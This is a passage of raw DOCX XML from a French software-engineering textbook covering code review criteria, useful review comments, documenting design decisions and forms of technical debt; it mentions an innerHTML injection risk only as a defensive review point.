        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2432"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Correction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3577"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Le code fait-il ce qui est demandé ?</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Cas limites, erreurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="243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Lisibilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Un tiers comprend-il l'intention ?</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Noms, découpage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2432"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cohérence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3577"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Respecte-t-il les conventions ?</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Structure, nommage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="243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Sécurité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Introduit-il une faille ?</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Injection, secret</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2432"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Testabilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3577"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Peut-on le vérifier ?</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Dépendances, pureté</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois formulations, trois intentions · markdown</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Un commentaire de revue utile</w:t>
        <w:br/>
        <w:br/>
        <w:t>**Bloquant** — `innerHTML` reçoit directement `commentaire.texte`, qui vient</w:t>
        <w:br/>
        <w:t>d'une API publique. Utilisez `textContent` ou construisez les nœuds.</w:t>
        <w:br/>
        <w:br/>
        <w:t>**Question** — Cette fonction gère-t-elle le cas où la liste est vide ?</w:t>
        <w:br/>
        <w:t>Je ne vois pas d'état affiché dans ce cas.</w:t>
        <w:br/>
        <w:br/>
        <w:t>**Suggestion (non bloquant)** — `donnees` pourrait devenir `commandes` :</w:t>
        <w:br/>
        <w:t>le nom actuel ne dit pas de quelles données il s'agit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Distinguer explicitement bloquant, question et suggestion évite les malentendus : l'auteur sait ce qui doit changer avant la fusion et ce qui relève du débat.</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REVUE ET STYLE AUTOMATIQUE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Les débats d'indentation ou de point-virgule n'ont pas leur place dans une revue. Un formateur automatique les règle une fois pour toutes ; la revue se concentre sur ce qu'aucun outil ne voit.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3365500"/>
            <wp:docPr id="49" name="Picture 49"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f47.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId73"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3365500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.47 — Le parcours d'une contribution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>40.2 Documenter ce qui ne se lit pas dans le code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le code dit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>comment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. La documentation doit dire </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>pourquoi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : les décisions, les contraintes, les compromis. Un commentaire qui paraphraserait le code n'ajoute rien.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux commentaires, deux valeurs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Inutile : répète le code</w:t>
        <w:br/>
        <w:t>// Incrémente le compteur</w:t>
        <w:br/>
        <w:t>compteur += 1;</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Utile : explique une décision non évidente</w:t>
        <w:br/>
        <w:t>// Le serveur limite les requêtes à 5 par seconde et ne renvoie pas</w:t>
        <w:br/>
        <w:t>// d'en-tête Retry-After : on attend 250 ms pour rester sous la limite.</w:t>
        <w:br/>
        <w:t>await pause(250);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.130 — Cinq documents et leurs publics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8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Document</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Contenu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="257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Public</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2862"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>README.md</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3577"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Installation, usage, structure</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Toute l'équipe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="286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CONTRIBUTING.md</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Conventions, processus</w:t>
            </w:r>
          </w:p>
        </w:tc>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Contributeurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2862"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CHANGELOG.md</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3577"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Versions et changements</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Utilisateurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="286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docs/decisions/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Décisions d'architecture</w:t>
            </w:r>
          </w:p>
        </w:tc>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Équipe technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2862"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Commentaires</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3577"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Intentions locales</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Lecteur du fichier</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DÉCISION D'ARCHITECTURE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Note courte qui expose un choix, les options écartées et ses conséquences. Elle évite qu'un nouveau venu défasse un choix sans en connaître les raisons.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une décision documentée en dix lignes · markdown</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004 — Pas de cadre applicatif pour le site vitrine</w:t>
        <w:br/>
        <w:br/>
        <w:t>Date : 2026-02-11</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Contexte</w:t>
        <w:br/>
        <w:t>Trois pages, peu d'interactions, un seul développeur, hébergement statique.</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Décision</w:t>
        <w:br/>
        <w:t>HTML, CSS et JavaScript natifs, sans cadre applicatif.</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Conséquences</w:t>
        <w:br/>
        <w:t>- Bundle minimal, démarrage instantané.</w:t>
        <w:br/>
        <w:t>- Pas de rendu déclaratif : les mises à jour du DOM sont manuelles.</w:t>
        <w:br/>
        <w:t>- Migration à envisager si le nombre d'écrans dépasse la vingtaine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>40.3 La dette technique</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La dette technique est un raccourci assumé ou subi qui rend les évolutions futures plus coûteuses. Elle n'est pas nécessairement une faute : un prototype livré vite peut être un bon compromis, à condition d'être explicite.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.131 — Cinq formes de dette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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="343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Symptôme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Traitement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2719"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Code dupliqué</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3434"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Même correction à trois endroits</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2862"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Extraire un module</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="271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Nommage flou</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="343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Personne ne sait où chercher</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Renommer, documenter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2719"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Dépendance obsolète</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3434"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Vulnérabilités, blocages</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2862"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mettre à jour</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="271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Absence de tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="343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Peur de modifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Tests sur les zones stables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2719"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Configuration implicite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3434"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Marche chez une personne</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
